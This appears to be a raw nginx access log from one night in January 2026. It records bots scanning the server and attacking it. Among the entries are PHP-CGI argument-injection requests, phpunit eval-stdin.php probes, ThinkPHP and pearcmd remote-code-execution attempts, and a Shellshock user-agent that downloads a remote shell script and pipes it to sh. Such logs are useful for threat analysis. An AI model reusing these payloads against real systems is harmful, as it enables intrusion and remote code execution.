204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:19:06:27 +0000] 200 - GET http 91.82.83.208 "/" [Client 45.156.129.57] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[17/Jan/2026:19:07:35 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 82.180.145.120] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:19:07:36 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 82.180.145.120] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:19:07:36 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:36 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 82.180.145.120] [Length 154] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:37 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:37 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:37 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:37 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:38 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:38 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:38 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:39 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:39 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:39 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:39 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:40 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:40 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:40 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:41 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:41 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:41 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:41 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:41 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:42 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:42 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:42 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:42 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:43 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:43 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:43 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:43 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:44 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:44 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:44 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:44 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:45 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:45 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:45 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:45 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:46 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:46 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:46 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:46 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:47 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:47 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:07:47 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 82.180.145.120] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:19:38 +0000] 200 - GET http 91.82.83.208 "/?XDEBUG_SESSION_START=phpstorm" [Client 79.124.40.174] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:19:21:36 +0000] 404 - POST http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[17/Jan/2026:19:21:36 +0000] 200 - GET http 91.82.83.208 "/" [Client 192.159.99.95] [Length 1033] [Gzip -] "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh||busybox wget -qO- http://41.231.37.153/rondo.qre.sh||curl -s http://41.231.37.153/rondo.qre.sh)|sh\x22& # rondo2012@atomicmail.io" "-" +[17/Jan/2026:19:27:12 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:19:32:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:19:39:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[17/Jan/2026:19:51:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:19:52:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:19:57:20 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 134.65.30.157] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:19:57:21 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 134.65.30.157] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:19:57:21 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:21 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 134.65.30.157] [Length 154] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:22 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:22 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:23 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:23 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:24 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:24 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:24 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:25 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:25 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:25 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:26 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:26 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:26 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:27 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:27 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:28 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:28 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:29 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:29 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:29 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:30 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:30 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:31 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:31 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:31 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:32 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:32 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:32 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:33 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:33 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:34 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:34 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:35 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:35 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:36 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:36 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:37 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:37 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:37 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:37 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:38 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:19:57:38 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 134.65.30.157] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:20:00:50 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[17/Jan/2026:20:05:08 +0000] 404 - GET http 91.82.83.208 "/manager/html" [Client 20.65.195.59] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[17/Jan/2026:20:05:16 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:20:21:01 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:20:21:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:20:23:17 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.18] [Length 1033] [Gzip -] "-" "-" +[17/Jan/2026:20:31:56 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 204.76.203.215] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:20:31:56 +0000] 400 - GET http localhost-nginx-proxy-manager "-" [Client 204.76.203.215] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:20:38:08 +0000] 404 - GET http localhost-nginx-proxy-manager "/boaform/admin/formLogin?username=user&psd=user" [Client 103.93.93.211] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:20:43:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:20:50:36 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:20:53:08 +0000] 404 - GET http 91.82.83.208 "/actuator/gateway/routes" [Client 79.124.40.174] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:20:54:43 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 147.185.132.19] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[17/Jan/2026:21:09:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:21:10:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:21:24:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 79.124.40.174] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:21:30:22 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[17/Jan/2026:21:33:46 +0000] 404 - GET http 91.82.83.208 "/dispatch.asp" [Client 195.178.110.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:21:34:11 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:21:36:06 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:21:37:28 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 128.140.66.63] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:21:37:29 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 128.140.66.63] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:21:37:29 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:29 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 128.140.66.63] [Length 154] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" 